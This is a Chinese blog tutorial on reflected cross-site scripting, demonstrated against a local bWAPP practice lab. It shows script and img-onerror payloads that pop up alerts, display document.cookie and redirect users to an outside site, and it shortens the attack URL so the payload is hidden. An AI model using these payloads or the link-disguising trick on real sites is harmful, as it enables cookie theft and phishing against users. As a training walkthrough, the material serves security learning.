WEB安全-跨站脚本攻击XSS

最新推荐文章于 2023-03-01 22:49:39 发布
最新推荐文章于 2023-03-01 22:49:39 发布
阅读量137 收藏 1
点赞数
分类专栏: web安全 渗透测试 burpsuite 文章标签: 安全漏洞 网络安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42277652/article/details/120186126
版权

XSS(跨站脚本攻击)

定义

浏览器将用户输入的内容,当做脚本执行,执行了恶意的功能,这种针对用户浏览器的攻击即跨站脚本攻击。

类型

主要分为三种类型:

  • 反射型

  • 存储型

  • DOM 型

XSS 危害

  • 盗取 Cookie
  • 盗取账户
  • 恶意软件下载
  • 键盘记录
  • 广告引流等等 JavaScript 能够写出的任意恶意功能

反射型 XSS

应用程序或 API 包括未经验证或未经转义的用户输入, 直接作为HTML 输出的一部分。一个成功的攻击可以让攻击者在受害者的浏览器中执行任意的 HTML 和 JavaScript 。

特点:非持久化,必须用户点击带有特定参数的链接才能引起。

影响范围:仅执行脚本的用户。

示例

SkyMacBookPro:~ demon$ docker run -d -p 0.0.0.0:8901:80 raesene/bwapp

<script>alert("hello world")</script>

image-20210816101253902

image-20210816102801637

<script>alert("点击此处修复");location.href="http://ceshis.com"</script>

image-20210816101616134

image-20210816103104373

<script>alert(document.cookie)</script>

image-20210816101711093

长网址缩短 (https://www.ft12.com)

http://192.168.43.120:8901/xss_get.php?firstname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&lastname=1&form=submit

image-20210816103631157

http://33h.co/wr3wj

image-20210816103718366

image-20210816103859911

image-20210816105505263

image-20210816112127046

/><img src=111.png onerror=alert(document.cookie)>

image-20210816112516272

防御措施

反射型 XSS 的限制与防御,危害范围相对较小,多为一次点击触发一次,对陌生的链接,不要随意点开。

练习

对于 bWAPP 的不同类型反射型 XSS 漏洞练习。

卫恪游
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透--20--跨站脚本攻击XSS
武天旭的博客
09-15 5444
1、漏洞名称 存储型XSS跨站脚本,反射型XSS跨站脚本 2、漏洞描述 跨站脚本攻击的英文全称是Cross Site Script,为了和样式表区分,缩写为XSS。发生的原因是网站将用户输入的内容输出到页面上,在这个过程中可能有恶意代码被浏览器执行跨站脚本攻击它指的是恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页之时,嵌入其中Web里面的JavaScript代...
web安全XSS攻击跨站脚本攻击)如何防范与实现
最新发布
AA2534193348的博客
05-31 4604
XSS攻击跨站脚本攻击)是一种常见的Web安全漏洞攻击者在Web页面中插入恶意脚本代码,并在受害人访问该页面时执行脚本代码,从而获取用户敏感信息、操作受害人账号或篡改页面内容等不当行为。XSS攻击可以通过输入表单、搜索框、评论区等途径实现,因此对于Web开发人员来说,要采取相应的措施预防和修复XSS漏洞,以确保用户数据的安全
web安全第八天:跨站脚本攻击
cc777777777的博客
03-01 1072
跨站脚本攻击
Web安全跨站脚本攻击漏洞
qq_52358808的博客
09-25 1014
跨站脚本(XSS)漏洞 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS 。恶意攻击者往 Web ⻚⾯⾥插⼊恶意 JavaScript代码,当⽤户浏览该⻚之时,嵌⼊ Web ⻚⾯⾥的代码会被执⾏,从⽽达到恶意攻击⽤户的⽬的。 常见类型 反射性XSS:payload经过后端,不经过数据库 存储型XSS:payload经过后端,经过数据库 DOM型XSS:payload不经过后端..
WEB漏洞篇——跨站脚本攻击XSS
m0_56634355的博客
06-05 4581
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
Web攻防系列教程之跨站脚本攻击和防范技巧详解
ccx_john的专栏
12-07 1443
XSS跨站脚本攻击一直都被认为是客户端Web安全中最主流的攻击方式。因为Web环境的复杂性以及XSS跨站脚本攻击的多变性,使得该类型攻击很难彻底解决。那么,XSS跨站脚本攻击具体攻击行为是什么,又该如何进行有效的防范呢?本文对此进行了有针对性的具体实例分析。 跨站脚本攻击(Cross Site Scripting)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影
web安全技术-实验七、跨站脚本攻击xss)(反射型).doc
08-20
web安全技术-实验七、跨站脚本攻击xss)(反射型)
XSS跨站脚本攻击
01-27
跨站脚本(crosssitescript)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用网站没有对用户提交数据...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
也谈跨站脚本攻击与防御
01-02
网络上曾经有过关于跨站脚本攻击与防御的文章,但是随着攻击技术的进步,以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了,而且由于这种对于跨站脚本认识上的混乱,导致现在很多的程序包括...
web漏洞--xss攻击跨站脚本攻击漏洞)
xsh951103的博客
01-07 3407
1.概述 XSS(cross site script)或者说跨站脚本是一种Web应用程序的漏洞,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 2.风险 1.盗取用户cookie,然后伪造用户身份登录,泄漏用户个人身份及用户订单信息。 2.操控用户浏览器,借助其他漏洞可能导致对https加密信息的破解,导致登录传输存在安全风险。 3.结合浏览器及其插件漏洞,下载病毒木马到浏览者的计算机上执行。 4.
WEB解决跨站脚本攻击过滤器
riapgypm的专栏
11-07 4938
使用antisamy来过滤参数值,过滤到可疑的html及script标签, 过滤器XSSFilter源码如下; import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; import
安全测试】Web应用安全XSS跨站脚本攻击漏洞
weixin_30815427的博客
04-12 211
前言 以前都只是在各类文档中见到过XSS,也进行过相关的学习,但是都是一知半解,过了一段时间就忘了。 前几天我们收到了了一份标题为《XX账号昵称参数中存在存储XSS漏洞》的报告文档,来源是一个叫漏洞盒子的机构,看它的官方介绍,是一个互联网安全测试众测平台。 第一次在实际工作中遇到相关的问题,所以决定再系统的学习一下,此篇为学习记录。 XSS概念及分类 XSS 全称(Cross Site Scrip...
Web安全XSS跨站脚本攻击
brizer的博客
08-26 6596
本文主要选择常见web攻击手段之一的XSS跨站脚本攻击)来进行讲解,说明其攻击原理,并提出相应的解决办法。XSSXSS 攻击,全称是“跨站脚本攻击”(Cross Site Scripting),之所以缩写为 XSS,主要是为了和“层叠样式表”(Cascading Style Sheets,CSS)区别开,以免混淆。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代
Web安全——跨站脚本攻击XSS
Newscoo的博客
08-02 692
跨站脚本攻击XSS)什么是XSS?一、XSS的分类1、反射型XSS2、存储型XSS3、DOM Based XSS二、跨站脚本的挖掘方法1、跨站脚本的核心挖掘思想2、跨站脚本的测试思路3、XSS探针4、跨站脚本的测试语句三、跨站脚本攻击技巧1、窃取Cookie2、篡改网页3、网络钓鱼4、网络挂马5、BEEF四、防御跨站脚本攻击的技巧1、HttpOnly2、输入检查(1)输入过滤(2)输入验证3、输出检查4、内容安全策略(CSP)总结网安小白又又又来瞎咧咧了!!!如有不足,请多指教!!! 什么是XSS? 跨
跨站脚本攻击
hzfu007的专栏
10-31 4673
以前看过分析家写过一篇文章,介绍跨站脚本安全隐患,当时只是知道有这样的问题,也没有仔细阅读,目前此类问题经常在一些安全站点发布,偶刚好看到这样一篇文章,抱着知道总比不知道好的想法,翻译整理了一下,原文在偶主页的collection目录里,错误之处请多多指点。OK,go............什么是跨站脚本(CSS/XSS)?我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的
web跨站脚本攻击XSS)与sql注入攻击 实例
a116385895的博客
07-02 3050
免责申明:对于此内容仅是提供参考,用于开发人员针对黑客攻击做好安全防范 XSS攻击跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS。但是,由于层叠样式表 (Cascading Style Sheets)的缩写也为CSS,为不与其混淆,特将跨站脚本缩写为XSS跨站脚本,顾名思义,就是恶意攻击者利用网站漏洞往Web页面里插入恶意代码,一般需要以下几个条件: 客户端访问的网站是一个有漏洞的网站,但是他没有意识到; 在这个网站中通过一些手段放入一段可以执行的代码,吸引客户
Web安全跨站脚本攻击XSS
我爱编程持之以恒
07-31 671
XSS 简介 跨站脚本攻击,英文全称是 Cross Site Script,本来缩写是CSS,但是为了和层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做“XSS”。 XSS 攻击,通常指黑客利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,从而通过“HTML注入”篡改了网页,插入了恶意的脚本,然后在用户浏览网页时,控制用户浏览器(盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害)的一种攻击方式。 XSS 危害 盗取各类用户帐号,如
跨站脚本执行漏洞详解
weixin_33813128的博客
02-17 205
本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该漏洞。由于时间仓促,水平有限,本文可能有不少错误,希望大家不吝赐教。 声明,请不要利用本文介绍的任何内容,代码或方法进行破坏,否则一切后果自负! 【漏洞成因】 原因很...
简述跨站脚本攻击XSS的工作原理
05-10
跨站脚本攻击XSS)是一种利用Web应用程序中的漏洞,将恶意脚本注入到受害者浏览器中的攻击方式。攻击者通过在目标网站中注入恶意脚本,使得用户在浏览网站时执行脚本,从而达到攻击目的。 XSS攻击的工作原理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值